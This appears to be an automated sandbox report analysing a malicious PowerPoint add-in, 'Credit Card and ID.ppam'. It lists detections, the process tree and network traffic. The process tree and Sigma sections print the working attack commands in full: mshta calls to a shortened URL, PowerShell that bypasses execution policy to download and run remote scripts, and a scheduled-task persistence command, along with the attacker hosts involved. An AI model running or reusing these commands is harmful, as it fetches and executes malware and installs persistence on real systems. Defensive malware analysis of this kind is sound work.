Loading ...

Play interactive tourEdit tour

Windows Analysis Report Credit Card and ID.ppam

Overview

General Information

Sample Name:Credit Card and ID.ppam
Analysis ID:528749
MD5:6af8522af160215e3c0f8883588e20d0
SHA1:f7cde5b67c5aa15f8d4366337792e468257b3fda
SHA256:1ca83ab27034a36bd899d91ed335e692afa949a4f1a1b30887e3f7d8651b63d1
Tags:ppam
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Sigma detected: Suspicious MSHTA Process Patterns
Writes or reads registry keys via WMI
Bypasses PowerShell execution policy
Sigma detected: Change PowerShell Policies to a Unsecure Level
Sigma detected: Microsoft Office Product Spawning Windows Shell
Creates processes via WMI
Sigma detected: MSHTA Spawning Windows Shell
Creates autostart registry keys with suspicious values (likely registry only malware)
Sigma detected: Mshta Spawning Windows Shell
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Stores large binary data to the registry
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Connects to a URL shortener service
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • POWERPNT.EXE (PID: 2596 cmdline: "C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" /AUTOMATION -Embedding MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
  • cmd.exe (PID: 1212 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\Desktop\Credit Card and ID.ppam" MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 2796 cmdline: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\Credit Card and ID.ppam MD5: EBBBEF2CCA67822395E24D6E18A3BDF6)
      • mshta.exe (PID: 1292 cmdline: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2944 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB); MD5: 852D67A27E454BD389FA7F02A8CBE23F)
        • schtasks.exe (PID: 2044 cmdline: C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 63 /tn ""kqopaueyu"" /F /tr ""\""MsHtA""\""https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html\" MD5: 97E0EC3D6D99E8CC2B17EF2D3760E8FC)
  • WmiPrvSE.exe (PID: 200 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 619A67C9F617B7E69315BB28ECD5E1DF)
  • taskeng.exe (PID: 2408 cmdline: taskeng.exe {99CBF033-5891-4579-A9C8-09ABEC64739D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • mshta.exe (PID: 2612 cmdline: C:\Windows\system32\MsHtA.EXE "https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html" MD5: 95828D670CFD3B16EE188168E083C3C5)
  • powershell.exe (PID: 2104 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a6990275 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • powershell.exe (PID: 1916 cmdline: powershell.exe ((gp HKCU:\Software).cookerr)|IEX MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • mshta.exe (PID: 2732 cmdline: C:\Windows\system32\MsHTa.exe" "http://www.starinxxxgkular.duckdns.org/s1/30.txt MD5: 95828D670CFD3B16EE188168E083C3C5)
  • powershell.exe (PID: 2808 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a6990275 MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • mshta.exe (PID: 1608 cmdline: C:\Windows\system32\MsHTa.exe" "http://www.starinxxxgkular.duckdns.org/s1/30.txt MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000003.440508255.00000000002D7000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x63b8:$s1: pOwersHelL
  • 0x6f3a:$s1: pOwersHelL
  • 0x63d6:$k1: -NoProfile
  • 0x6f58:$k1: -NoProfile
  • 0x63d6:$kn2: -NoProfile
  • 0x6f58:$kn2: -NoProfile
00000005.00000003.439129933.0000000003A3E000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x2e4:$s1: pOwersHelL
  • 0x11c4:$s1: pOwersHelL
  • 0x20a4:$s1: pOwersHelL
  • 0x2f84:$s1: pOwersHelL
  • 0x3d76:$s1: pOwersHelL
  • 0x4b08:$s1: pOwersHelL
  • 0x302:$k1: -NoProfile
  • 0x11e2:$k1: -NoProfile
  • 0x20c2:$k1: -NoProfile
  • 0x2fa2:$k1: -NoProfile
  • 0x3d94:$k1: -NoProfile
  • 0x4b26:$k1: -NoProfile
  • 0x302:$kn2: -NoProfile
  • 0x11e2:$kn2: -NoProfile
  • 0x20c2:$kn2: -NoProfile
  • 0x2fa2:$kn2: -NoProfile
  • 0x3d94:$kn2: -NoProfile
  • 0x4b26:$kn2: -NoProfile
00000005.00000003.439823527.0000000003A41000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0xd76:$s1: pOwersHelL
  • 0x1b08:$s1: pOwersHelL
  • 0xd94:$k1: -NoProfile
  • 0x1b26:$k1: -NoProfile
  • 0xd94:$kn2: -NoProfile
  • 0x1b26:$kn2: -NoProfile
00000005.00000002.441615888.0000000003A42000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0xb08:$s1: pOwersHelL
  • 0xb26:$k1: -NoProfile
  • 0xb26:$kn2: -NoProfile
00000005.00000003.430608858.00000000002D2000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x87c:$s1: pOwersHelL
  • 0x89a:$k1: -NoProfile
  • 0x89a:$kn2: -NoProfile
Click to see the 14 entries

Sigma Overview

System Summary:

barindex
Sigma detected: Suspicious MSHTA Process PatternsShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, CommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\Credit Card and ID.ppam, ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 2796, ProcessCommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, ProcessId: 1292
Sigma detected: Change PowerShell Policies to a Unsecure LevelShow sources
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1292, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, ProcessId: 2944
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, CommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\user\Desktop\Credit Card and ID.ppam, ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 2796, ProcessCommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, ProcessId: 1292
Sigma detected: MSHTA Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1292, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, ProcessId: 2944
Sigma detected: Mshta Spawning Windows ShellShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1292, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, ProcessId: 2944
Sigma detected: Non Interactive PowerShellShow sources
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: c:\windows\system32\calc\..\mshta https://hahahahh@j.mp/ODOASODOccomplermxjdajse, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 1292, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB);, ProcessId: 2944

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Credit Card and ID.ppamVirustotal: Detection: 23%Perma Link
Antivirus detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\30[1].htmAvira: detection malicious, Label: JS/Dropper.G4
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 67.199.248.16:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.203.237:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknownHTTPS traffic detected: 205.196.123.58:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.168.45:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49178 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.217.168.9:443 -> 192.168.2.22:49179 version: TLS 1.2
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: System.Management.Automation.pdbBB source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbrogr source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbiles source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbLE=C source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\mshta.exe
Source: global trafficDNS query: name: j.mp
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 67.199.248.16:443
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 67.199.248.16:443

Networking:

barindex
Uses dynamic DNS servicesShow sources
Source: unknownDNS query: name: www.starinxxxgkular.duckdns.org
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
Source: Joe Sandbox ViewIP Address: 104.16.203.237 104.16.203.237
Source: Joe Sandbox ViewIP Address: 104.16.203.237 104.16.203.237
Source: global trafficHTTP traffic detected: GET /ODOASODOccomplermxjdajse HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /file/o7mbmqzedgahqhw/30.doc/file HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: www.mediafire.com
Source: global trafficHTTP traffic detected: GET /k67dpqw5qwtg/o7mbmqzedgahqhw/30.doc HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Cookie: ukey=6xpb2tazciakllrv4ebq5j0751h13hdfConnection: Keep-AliveHost: download1370.mediafire.com
Source: global trafficHTTP traffic detected: GET /p/30.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: kdaoskdokaodkwldld.blogspot.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /static/v1/widgets/1529571102-css_bundle_v2.css HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /static/v1/jsbin/403901366-ieretrofit.js HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=3903609419317699398&zx=5f07c876-ed15-412f-a301-ebcedf46395e HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /static/v1/widgets/1397508952-widgets.js HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://kdaoskdokaodkwldld.blogspot.com/p/30.html&type=blog HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ServiceLogin?passive=true&continue=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&followup=https://www.blogger.com/blogin.g?blogspotURL%3Dhttps://kdaoskdokaodkwldld.blogspot.com/p/30.html%26type%3Dblog%26bpli%3D1&go=true HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: accounts.google.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https%3A%2F%2Fkdaoskdokaodkwldld.blogspot.com%2Fp%2F30.html&type=blog&bpli=1 HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: www.blogger.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1Accept: */*Referer: https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: resources.blogblog.comConnection: Keep-Alive
